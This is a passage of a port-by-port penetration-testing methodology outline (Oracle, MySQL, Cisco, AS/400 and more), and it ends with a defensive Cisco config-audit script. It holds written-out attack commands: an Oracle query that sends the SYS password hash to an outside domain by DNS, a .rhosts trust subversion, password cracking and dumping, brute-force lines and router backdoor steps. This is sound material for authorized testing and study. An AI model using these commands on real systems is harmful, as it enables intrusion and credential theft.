15.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
15.14.2. ldap brute force
15.14.2.1. bf_ldap
15.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate
15.14.2.1.2. Optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)
15.14.2.2. K0ldS
15.14.2.3. LDAP_Brute.pl
15.14.3. Examine Configuration Files
15.14.3.1. General
15.14.3.1.1. containers.ldif
15.14.3.1.2. ldap.cfg
15.14.3.1.3. ldap.conf
15.14.3.1.4. ldap.xml
15.14.3.1.5. ldap-config.xml
15.14.3.1.6. ldap-realm.xml
15.14.3.1.7. slapd.conf
15.14.3.2. IBM SecureWay V3 server
15.14.3.2.1. V3.sas.oc
15.14.3.3. Microsoft Active Directory server
15.14.3.3.1. msadClassesAttrs.ldif
15.14.3.4. Netscape Directory Server 4
15.14.3.4.1. nsslapd.sas_at.conf
15.14.3.4.2. nsslapd.sas_oc.conf
15.14.3.5. OpenLDAP directory server
15.14.3.5.1. slapd.sas_at.conf
15.14.3.5.2. slapd.sas_oc.conf
15.14.3.6. Sun ONE Directory Server 5.1
15.14.3.6.1. 75sas.ldif
15.15. PPTP/L2TP/VPN port 500/1723 open
15.15.1. Enumeration
15.15.1.1. ike-scan
15.15.1.2. ike-probe
15.15.2. Brute-Force
15.15.2.1. ike-crack
15.15.3. Reference Material
15.15.3.1. PSK cracking paper
15.15.3.2. SecurityFocus Infocus
15.15.3.3. Scanning a VPN Implementation
15.16. Modbus port 502 open
15.16.1. modscan
15.17. rlogin port 513 open
15.17.1. Rlogin Enumeration
15.17.1.1. Find the files
15.17.1.1.1. find / -name .rhosts
15.17.1.1.2. locate .rhosts
15.17.1.2. Examine Files
15.17.1.2.1. cat .rhosts
15.17.1.3. Manual Login
15.17.1.3.1. rlogin hostname -l username
15.17.1.3.2. rlogin <IP>
15.17.1.4. Subvert the files
15.17.1.4.1. echo ++ > .rhosts
15.17.2. Rlogin Brute force
15.17.2.1. Hydra
15.18. rsh port 514 open
15.18.1. Rsh Enumeration
15.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
15.18.2. Rsh Brute Force
15.18.2.1. rsh-grind
15.18.2.2. Hydra
15.18.2.3. medusa
15.19. SQL Server Ports 1433/1434 open
15.19.1. SQL Enumeration
15.19.1.1. piggy
15.19.1.2. SQLPing
15.19.1.2.1. sqlping ip_address/hostname
15.19.1.3. SQLPing2
15.19.1.4. SQLPing3
15.19.1.5. SQLpoke
15.19.1.6. SQL Recon
15.19.1.7. SQLver
15.19.2. SQL Brute Force
15.19.2.1. SQLPAT
15.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
15.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
15.19.2.2. SQL Dict
15.19.2.3. SQLAT
15.19.2.4. Hydra
15.19.2.5. SQLlhf
15.19.2.6. ForceSQL
15.20. Citrix port 1494 open
15.20.1. Citrix Enumeration
15.20.1.1. Default Domain
15.20.1.2. Published Applications
15.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
15.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
15.20.2. Citrix Brute Force
15.20.2.1. bforce.js
15.20.2.2. connect.js
15.20.2.3. Citrix Brute-forcer
15.20.2.4. Reference Material
15.20.2.4.1. Hacking Citrix - the legitimate backdoor
15.20.2.4.2. Hacking Citrix - the forceful way
15.21. Oracle Port 1521 Open
15.21.1. Oracle Enumeration
15.21.1.1. oracsec
15.21.1.2. Repscan
15.21.1.3. Sidguess
15.21.1.4. Scuba
15.21.1.5. DNS/HTTP Enumeration
15.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
15.21.1.5.2. Untitled
15.21.1.6. WinSID
15.21.1.7. Oracle default password list
15.21.1.8. TNSVer
15.21.1.8.1. tnsver host [port]
15.21.1.9. TCP Scan
15.21.1.10. Oracle TNSLSNR
15.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
15.21.1.11. TNSCmd
15.21.1.11.1. perl tnscmd.pl -h ip_address
15.21.1.11.2. perl tnscmd.pl version -h ip_address
15.21.1.11.3. perl tnscmd.pl status -h ip_address
15.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
15.21.1.12. LSNrCheck
15.21.1.13. Oracle Security Check (needs credentials)
15.21.1.14. OAT
15.21.1.14.1. sh opwg.sh -s ip_address
15.21.1.14.2. opwg.bat -s ip_address
15.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
15.21.1.15. OScanner
15.21.1.15.1. sh oscanner.sh -s ip_address
15.21.1.15.2. oscanner.exe -s ip_address
15.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
15.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
15.21.1.16. NGS Squirrel for Oracle
15.21.1.17. Service Register
15.21.1.17.1. Service-register.exe ip_address
15.21.1.18. PLSQL Scanner 2008
15.21.2. Oracle Brute Force
15.21.2.1. OAK
15.21.2.1.1. ora-getsid hostname port sid_dictionary_list
15.21.2.1.2. ora-auth-alter-session host port sid username password sql
15.21.2.1.3. ora-brutesid host port start
15.21.2.1.4. ora-pwdbrute host port sid username password-file
15.21.2.1.5. ora-userenum host port sid userlistfile
15.21.2.1.6. ora-ver -e (-f -l -a) host port
15.21.2.2. breakable (Targets Application Server Port)
15.21.2.2.1. breakable.exe host url [port] [v]
15.21.2.2.1.1. host - ip_address of the Oracle Portal Server
15.21.2.2.1.2. url - PATH_INFO, i.e. /pls/orasso
15.21.2.2.1.3. port - TCP port the Oracle Portal Server is serving pages from
15.21.2.2.1.4. v - verbose
15.21.2.3. SQLInjector (Targets Application Server Port)
15.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
15.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
15.21.2.4. Check Password
15.21.2.5. orabf
15.21.2.5.1. orabf [hash]:[username] [options]
15.21.2.6. thc-orakel
15.21.2.6.1. Cracker
15.21.2.6.2. Client
15.21.2.6.3. Crypto
15.21.2.7. DBVisualisor
15.21.2.7.1. Sql scripts from pentest.co.uk
15.21.2.7.2. Manual SQL input of previously reported vulnerabilities
15.21.3. Oracle Reference Material
15.21.3.1. Understanding SQL Injection
15.21.3.2. SQL Injection walkthrough
15.21.3.3. SQL Injection by example
15.21.3.4. Advanced SQL Injection in Oracle databases
15.21.3.5. Blind SQL Injection
15.21.3.6. SQL Cheatsheets
15.21.3.6.1. Untitled
15.22. NFS Port 2049 open
15.22.1. NFS Enumeration
15.22.1.1. showmount -e hostname/ip_address
15.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
15.22.2. NFS Brute Force
15.22.2.1. Interact with NFS share and try to add/delete
15.22.2.2. Exploit and Confuse Unix
15.22.3. Examine Configuration Files
15.22.3.1. /etc/exports
15.22.3.2. /etc/lib/nfs/xtab
15.22.4. nmap nse script
15.22.4.1. nfs-showmount
15.23. Compaq/HP Insight Manager Port 2301, 2381 open
15.23.1. HP Enumeration
15.23.1.1. Authentication Method
15.23.1.1.1. Host OS Authentication
15.23.1.1.2. Default Authentication
15.23.1.2. Wikto
15.23.1.3. Nstealth
15.23.2. HP Bruteforce
15.23.2.1. Hydra
15.23.2.2. Acunetix
15.23.3. Examine Configuration Files
15.23.3.1. path.properties
15.23.3.2. mx.log
15.23.3.3. CLIClientConfig.cfg
15.23.3.4. database.props
15.23.3.5. pg_hba.conf
15.23.3.6. jboss-service.xml
15.23.3.7. .namazurc
15.24. MySQL port 3306 open
15.24.1. Enumeration
15.24.1.1. nmap -A -n -p3306 <IP Address>
15.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
15.24.1.3. telnet IP_Address 3306
15.24.1.4. use test; select * from test;
15.24.1.5. To check for other DB's -- show databases
15.24.2. Administration
15.24.2.1. MySQL Network Scanner
15.24.2.2. MySQL GUI Tools
15.24.2.3. mysqlshow
15.24.2.4. mysqlbinlog
15.24.3. Manual Checks
15.24.3.1. Default usernames and passwords
15.24.3.1.1. username: root, password: (blank)
15.24.3.1.2. testing
15.24.3.2. Configuration Files
15.24.3.2.1. Operating System
15.24.3.2.2. Command History
15.24.3.2.3. Log Files
15.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
15.24.3.2.5. MySQL data directory (Location specified in my.cnf)
15.24.3.2.6. SSL Check
15.24.3.3. Privilege Escalation
15.24.3.3.1. Current Level of access
15.24.3.3.2. Access passwords
15.24.3.3.3. Create a new user and grant him privileges
15.24.3.3.4. Break into a shell
15.24.4. SQL injection
15.24.4.1. mysql-miner.pl
15.24.4.1.1. mysql-miner.pl http://target/ expected_string database
15.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
15.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
15.24.5. References.
15.24.5.1. Design Weaknesses
15.24.5.1.1. MySQL running as root
15.24.5.1.2. Exposed publicly on Internet
15.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
15.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
15.25. RDesktop port 3389 open
15.25.1. Rdesktop Enumeration
15.25.1.1. Remote Desktop Connection
15.25.2. Rdesktop Bruteforce
15.25.2.1. TSGrinder
15.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
15.25.2.2. Tscrack
15.26. Sybase Port 5000+ open
15.26.1. Sybase Enumeration
15.26.1.1. sybase-version ip_address from NGS
15.26.2. Sybase Vulnerability Assessment
15.26.2.1. Use DBVisualiser
15.26.2.1.1. Sybase Security checksheet
15.26.2.1.2. Manual sql input of previously reported vulnerabilities
15.26.2.2. NGS Squirrel for Sybase
15.27. SIP Port 5060 open
15.27.1. SIP Enumeration
15.27.1.1. netcat
15.27.1.1.1. nc IP_Address Port
15.27.1.2. sipflanker
15.27.1.2.1. python sipflanker.py 192.168.1-254
15.27.1.3. Sipscan
15.27.1.4. smap
15.27.1.4.1. smap IP_Address/Subnet_Mask
15.27.1.4.2. smap -o IP_Address/Subnet_Mask
15.27.1.4.3. smap -l IP_Address
15.27.2. SIP Packet Crafting etc.
15.27.2.1. sipsak
15.27.2.1.1. Tracing paths: - sipsak -T -s sip:username@domain
15.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
15.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
15.27.2.2. siprogue
15.27.3. SIP Vulnerability Scanning/ Brute Force
15.27.3.1. tftp bruteforcer
15.27.3.1.1. Default dictionary file
15.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
15.27.3.2. VoIPaudit
15.27.3.3. SiVuS
15.27.4. Examine Configuration Files
15.27.4.1. SIPDefault.cnf
15.27.4.2. asterisk.conf
15.27.4.3. sip.conf
15.27.4.4. phone.conf
15.27.4.5. sip_notify.conf
15.27.4.6. <Ethernet address>.cfg
15.27.4.7. 000000000000.cfg
15.27.4.8. phone1.cfg
15.27.4.9. sip.cfg etc. etc.
15.28. VNC port 5900^ open
15.28.1. VNC Enumeration
15.28.1.1. Scans
15.28.1.1.1. 5900^ for direct access; 5800 for HTTP access.
15.28.2. VNC Brute Force
15.28.2.1. Password Attacks
15.28.2.1.1. Remote
15.28.2.1.2. Local
15.28.3. Examine Configuration Files
15.28.3.1. .vnc
15.28.3.2. /etc/vnc/config
15.28.3.3. $HOME/.vnc/config
15.28.3.4. /etc/sysconfig/vncservers
15.28.3.5. /etc/vnc.conf
15.29. Tor Port 9001, 9030 open
15.29.1. Tor Node Checker
15.29.1.1. Ip Pages
15.29.1.2. Kewlio.net
15.29.2. nmap NSE script
15.30. Jet Direct 9100 open
15.30.1. hijetta
16. Password cracking
16.1. Rainbow crack
16.1.1. ophcrack
16.1.2. rainbow tables
16.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
16.2. Ophcrack
16.3. Cain & Abel
16.4. John the Ripper
16.4.1. ./unshadow passwd shadow > file_to_crack
16.4.2. ./john -single file_to_crack
16.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
16.4.4. ./john -show file_to_crack
16.4.5. ./john --incremental:All file_to_crack
16.5. fgdump
16.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
16.6. pwdump6
16.7. medusa
16.8. LCP
16.9. L0phtcrack (Note: - This tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)
16.9.1. Domain credentials
16.9.2. Sniffing
16.9.3. pwdump import
16.9.4. sam import
16.10. aiocracker
16.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
17. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
17.1. Manual
17.1.1. Patch Levels
17.1.2. Confirmed Vulnerabilities
17.1.2.1. Severe
17.1.2.2. High
17.1.2.3. Medium
17.1.2.4. Low
17.2. Automated
17.2.1. Reports
17.2.2. Vulnerabilities
17.2.2.1. Severe
17.2.2.2. High
17.2.2.3. Medium
17.2.2.4. Low
17.3. Tools
17.3.1. GFI
17.3.2. Nessus (Linux)
17.3.2.1. Nessus (Windows)
17.3.3. NGS Typhon
17.3.4. NGS Squirrel for Oracle
17.3.5. NGS Squirrel for SQL
17.3.6. SARA
17.3.7. MatriXay
17.3.8. BiDiBlah
17.3.9. SSA
17.3.10. Oval Interpreter
17.3.11. Xscan
17.3.12. Security Manager +
17.3.13. Inguma
17.4. Resources
17.4.1. Security Focus
17.4.2. Microsoft Security Bulletin
17.4.3. Common Vulnerabilities and Exploits (CVE)
17.4.4. National Vulnerability Database (NVD)
17.4.5. The Open Source Vulnerability Database (OSVDB)
17.4.5.1. Standalone Database
17.4.5.1.1. Update URL
17.4.6. United States Computer Emergency Response Team (US-CERT)
17.4.7. Computer Emergency Response Team
17.4.8. Mozilla Security Information
17.4.9. SANS
17.4.10. Securiteam
17.4.11. PacketStorm Security
17.4.12. Security Tracker
17.4.13. Secunia
17.4.14. Vulnerabilities.org
17.4.15. ntbugtraq
17.4.16. Wireless Vulnerabilities and Exploits (WVE)
17.5. Blogs
17.5.1. Carnal0wnage
17.5.2. Fsecure Blog
17.5.3. g0ne blog
17.5.4. GNUCitizen
17.5.5. ha.ckers Blog
17.5.6. Jeremiah Grossman Blog
17.5.7. Metasploit
17.5.8. nCircle Blogs
17.5.9. pentestmonkey.net
17.5.10. Rational Security
17.5.11. Rise Security
17.5.12. Security Fix Blog
17.5.13. Software Vulnerability Exploitation Blog
17.5.14. Taosecurity Blog
18. AS/400 Auditing
18.1. Remote
18.1.1. Information Gathering
18.1.1.1. Nmap using common iSeries (AS/400) services.
18.1.1.1.1. Unsecured services (Port;name;description)
18.1.1.1.2. Secured services (Port;name;description)
18.1.1.2. NetCat (old school technique)
18.1.1.2.1. nc -v -z -w timeout_seconds target ListOfServices.txt | grep "open"
18.1.1.3. Banner Grabbing
18.1.1.3.1. Telnet
18.1.1.3.2. FTP
18.1.1.3.3. HTTP Banner
18.1.1.3.4. POP3
18.1.1.3.5. SNMP
18.1.1.3.6. SMTP
18.1.2. Users Enumeration
18.1.2.1. Default AS/400 user accounts
18.1.2.2. Error messages
18.1.2.2.1. Telnet Login errors
18.1.2.2.2. POP3 authentication Errors
18.1.2.3. Qsys symbolic link (if ftp is enabled)
18.1.2.3.1. ftp target | quote stat | quote site namefmt 1
18.1.2.3.2. cd /
18.1.2.3.3. quote site listfmt 1
18.1.2.3.4. mkdir temp
18.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
18.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
18.1.2.3.7. dir /temp/qsys/*.usrprf
18.1.2.4. LDAP
18.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
18.1.2.4.2. Tool to browse LDAP
18.1.3. Exploitation
18.1.3.1. CVE References
18.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
18.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
18.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
18.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
18.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
18.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
18.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
18.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
18.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
18.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
18.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
18.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
18.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
18.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
18.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
18.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
18.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
18.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
18.1.3.2. Access with Work Station Gateway
18.1.3.2.1. http://target:5061/WSG
18.1.3.2.2. Default AS/400 accounts.
18.1.3.3. Network attacks (next release)
18.1.3.3.1. DB2
18.1.3.3.2. QSHELL
18.1.3.3.3. Hijacking Terminals
18.1.3.3.4. Trojan attacks
18.1.3.3.5. Hacking from AS/400
18.2. Local
18.2.1. System Value Security
18.2.1.1. Untitled
18.2.1.1.1. Untitled
18.2.1.2. Untitled
18.2.1.2.1. Untitled
18.2.1.3. Untitled
18.2.1.3.1. Untitled
18.2.1.4. Untitled
18.2.1.4.1. Recommended value is 30
18.2.2. Password Policy
18.2.2.1. Untitled
18.2.2.1.1. Untitled
18.2.2.1.2. Untitled
18.2.2.2. Untitled
18.2.2.2.1. Untitled
18.2.2.3. Untitled
18.2.2.3.1. Untitled
18.2.2.4. Untitled
18.2.2.4.1. Untitled
18.2.2.5. Untitled
18.2.3. Audit level
18.2.3.1. Untitled
18.2.3.1.1. Recommended value is *SECURITY
18.2.4. Documentation
18.2.4.1. Users class
18.2.4.1.1. Untitled
18.2.4.2. System Audit Settings
18.2.4.2.1. Untitled
18.2.4.3. Special Authorities Definitions
18.2.4.3.1. Untitled
19. Bluetooth Specific Testing
19.1. Bluescanner
19.2. Bluesweep
19.3. btscanner
19.4. Redfang
19.5. Blueprint
19.6. Bluesnarfer
19.7. Bluebugger
19.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
19.8. Blueserial
19.9. Bloover
19.10. Bluesniff
19.11. Exploit Frameworks
19.11.1. BlueMaho
19.11.1.1. Untitled
19.12. Resources
19.12.1. URL's
19.12.1.1. BlueStumbler.org
19.12.1.2. Bluejackq.com
19.12.1.3. Bluejacking.com
19.12.1.4. Bluejackers
19.12.1.5. bluetooth-pentest
19.12.1.6. ibluejackedyou.com
19.12.1.7. Trifinite
19.12.2. Vulnerability Information
19.12.2.1. Common Vulnerabilities and Exploits (CVE)
19.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
19.12.3. White Papers
19.12.3.1. Bluesnarfing
20. Cisco Specific Testing
20.1. Methodology
20.1.1. Scan & Fingerprint.
20.1.1.1. Untitled
20.1.1.2. Untitled
20.1.1.3. If SNMP is active, then community string guessing should be performed.
20.1.2. Credentials Guessing.
20.1.2.1. Untitled
20.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
20.1.3. Connect
20.1.3.1. Untitled
20.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
20.1.4. Check for bugs
20.1.4.1. Untitled
20.1.4.1.1. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
20.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
20.1.5. Further your attack
20.1.5.1. Untitled
20.1.5.1.1. running-config is the currently running configuration. It is loaded from the startup-config on boot. This configuration file is editable and the changes take effect immediately, but any changes are lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.
20.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
20.1.5.2. Untitled
20.1.5.2.1. #> access-list 100 permit ip <IP> any
20.2. Scan & Fingerprint.
20.2.1. Port Scanning
20.2.1.1. nmap
20.2.1.1.1. Untitled
20.2.1.2. Other tools
20.2.1.2.1. Untitled
20.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
20.2.2. Fingerprinting
20.2.2.1. Untitled
20.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
20.2.2.2. Untitled
20.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
20.2.2.2.2. Untitled
20.3. Password Guessing.
20.3.1. Untitled
20.3.1.1. ./CAT -h <IP> -a password.wordlist
20.3.1.2. Untitled
20.3.2. Untitled
20.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
20.3.2.2. Untitled
20.3.3. Untitled
20.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
20.3.3.2. Untitled
20.4. SNMP Attacks.
20.4.1. Untitled
20.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
20.4.1.2. Untitled
20.4.2. Untitled
20.4.2.1. onesixtyone -c SNMP.wordlist <IP>
20.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
    Scanning 1 hosts, 64 communities
    10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
    10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
20.4.3. Untitled
20.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>
20.4.3.2. Untitled
20.5. Connecting.
20.5.1. Telnet
20.5.1.1. Untitled
20.5.1.1.1. telnet <IP>
20.5.1.1.2. Sample Banners
20.5.2. SSH
20.5.3. Web Browser
20.5.3.1. Untitled
20.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
20.5.3.1.2. Authentication Required
    Enter username and password for "level_15_access" at http://10.1.1.1
    User Name:
    Password:
20.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
20.5.4. TFTP
20.5.4.1. Untitled
20.5.4.1.1. Untitled
20.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
20.5.4.2. Untitled
20.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
20.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
20.5.4.2.3. Creating backdoors in Cisco IOS using TCL
20.6. Known Bugs.
20.6.1. Attack Tools
20.6.1.1. Untitled
20.6.1.1.1. Untitled
20.6.1.2. Untitled
20.6.1.2.1. Web browse to the Cisco device: http://<IP>
20.6.1.2.2. Untitled
20.6.1.2.3. Untitled
20.6.1.2.4. Untitled
20.6.1.3. Untitled
20.6.1.3.1. ./ios-w3-vuln 192.168.1.1 fetch > /tmp/router.txt
20.6.2. Common Vulnerabilities and Exploits (CVE) Information
20.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
20.7. Configuration Files.
20.7.1. Untitled
20.7.1.1. Configuration files explained
20.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.
20.7.1.1.2. Untitled
20.7.1.1.3. Untitled
20.7.1.1.4. Password Encryption Utilised
20.7.1.1.5. Untitled
20.7.1.2. Configuration Testing Tools
20.7.1.2.1. Nipper
20.7.1.2.2. fwauto (Beta)
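The configuration-file points above (a clear-text "enable password" that is superseded by "enable secret", type 7 encoding, default SNMP community strings, telnet on the vty lines) can be checked from the defender's side before a tool such as Nipper is run. The following audit script is an added example, not code from this framework or from Nipper/fwauto; the two configs it reads are constructed samples with placeholder hashes and type 7 strings, and the function names are the author's own assumptions.

```python
import re
from typing import List, Optional, Tuple

Finding = Tuple[str, str]  # (severity, description)

# Constructed sample of a weak running-config; hashes/type 7 strings are placeholders.
WEAK_CONFIG = """\
version 12.2
hostname edge-router
enable password router
enable secret 5 $1$PLCH$placeholderhashvalue000000000
username admin password 7 0822455D0A16PLACEHOLDER
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 password cisco
 login
 transport input telnet
line con 0
 password 7 094F471A1A0APLACEHOLDER
"""

# Constructed sample of the same device after remediation.
HARDENED_CONFIG = """\
version 12.2
hostname edge-router
service password-encryption
enable secret 5 $1$PLCH$placeholderhashvalue000000000
username admin secret 5 $1$PLCH$placeholderhashvalue000000000
snmp-server community Str0ngC0mmun1ty RO
line vty 0 4
 login local
 transport input ssh
"""

DEFAULT_COMMUNITIES = {"public", "private", "cisco"}


def _pw_kind(enc_type: Optional[str]) -> Optional[str]:
    """Map the IOS password type digit to a description of how weakly it is stored."""
    if enc_type in (None, "0"):
        return "clear text"
    if enc_type == "7":
        return "type 7 (reversible obfuscation)"
    return None  # types 5/8/9 are one-way hashes and are not flagged here


def audit_ios_config(config: str) -> List[Finding]:
    """Scan an IOS config for weak credential storage and risky management settings."""
    findings: List[Finding] = []
    lines = [l.rstrip() for l in config.splitlines()]
    has_secret = any(l.startswith("enable secret ") for l in lines)
    if not has_secret:
        findings.append(("high", "no 'enable secret' configured"))
    if "service password-encryption" not in lines:
        findings.append(("medium", "'service password-encryption' is off"))

    current_line = None  # the 'line ...' block we are inside, if any
    for raw in lines:
        s = raw.strip()
        if raw and not raw.startswith(" "):  # top-level statement ends any line block
            current_line = s if s.startswith("line ") else None

        m = re.match(r"enable password (?:(\d+) )?\S+$", s)
        if m:
            kind = _pw_kind(m.group(1))
            if kind:
                sev = "low" if has_secret else "high"
                note = " (superseded by 'enable secret' for remote access)" if has_secret else ""
                findings.append((sev, f"'enable password' stored as {kind}{note}"))
            continue

        m = re.match(r"username (\S+) password (?:(\d+) )?\S+$", s)
        if m:
            kind = _pw_kind(m.group(2))
            if kind:
                findings.append(("medium", f"user '{m.group(1)}' password stored as {kind}; use 'username ... secret'"))
            continue

        m = re.match(r"snmp-server community (\S+) (RO|RW)\b", s)
        if m:
            community, mode = m.groups()
            if mode == "RW":
                findings.append(("high", f"SNMP community '{community}' is read-write: the config can be fetched or pushed via SNMP"))
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(("high", f"SNMP community '{community}' is a well-known default"))
            continue

        if current_line:
            m = re.match(r"password (?:(\d+) )?\S+$", s)
            if m:
                kind = _pw_kind(m.group(1))
                if kind:
                    findings.append(("medium", f"{current_line}: line password stored as {kind}"))
            elif s == "transport input telnet" or s.startswith("transport input all"):
                findings.append(("medium", f"{current_line}: telnet accepted; restrict to 'transport input ssh'"))
    return findings


def severity_counts(findings: List[Finding]) -> dict:
    """Summarise findings by severity for a quick report line."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for sev, _ in findings:
        counts[sev] += 1
    return counts


if __name__ == "__main__":
    for sev, desc in audit_ios_config(WEAK_CONFIG):
        print(f"[{sev:6}] {desc}")
    print(severity_counts(audit_ios_config(WEAK_CONFIG)))
```

Run against the constructed weak config the script reports nine findings (three high, five medium, one low) and against the hardened config none; the "enable password" line is rated low only because an "enable secret" is present, matching the note above that the secret takes precedence for remote access.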
20.8. References.
20.8.1. Cisco IOS Exploitation Techniques
21. Citrix Specific Testing
